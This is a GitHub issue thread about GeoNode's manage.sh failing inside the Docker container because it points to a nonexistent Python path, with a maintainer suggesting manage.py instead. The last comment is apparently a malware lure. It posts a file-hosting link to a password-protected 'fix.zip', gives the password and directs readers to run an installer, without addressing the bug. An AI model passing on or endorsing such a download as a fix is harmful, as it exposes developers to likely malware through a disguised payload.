### ISSUE TITLE
manage.sh does not work due to wrong python path

### ISSUE THREAD

**Issue by gannebamm** [GeoNode/geonode#12536]
## Expected Behavior
I can use `./manage.sh` in a docker container to execute management commands with loaded environment.

## Actual Behavior

The python path is wrong resulting in an error like:

```sh
root@6d001b86d8bb:/usr/src/geonode# ./manage.sh --help
./manage.sh: line 2: /usr/local/bin/python: No such file or directory

root@6d001b86d8bb:/usr/src/geonode# which python
/usr/bin/python
```
## Steps to Reproduce the Problem

  1. pull container
  2. run container interactivly
  3. try to use manage.sh (like `./manage.sh --help`)

## Specifications

  - GeoNode version: 4.3.1 container was pulled
  - Installation type (vanilla, geonode-project): vanilla
  - Installation method (manual, docker): docker
  - Additional details: Also not working with 4.2.x

**Comment by t-book** [comment]
@gannebamm In a docker env I normally run manage.py directly as the docs suggest as well. f.e. https://docs.geonode.org/en/master/admin/mgmt_commands/index.html#management-command-importlayers

Might be wrong but isn't manage.sh for local development or a manual install?

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
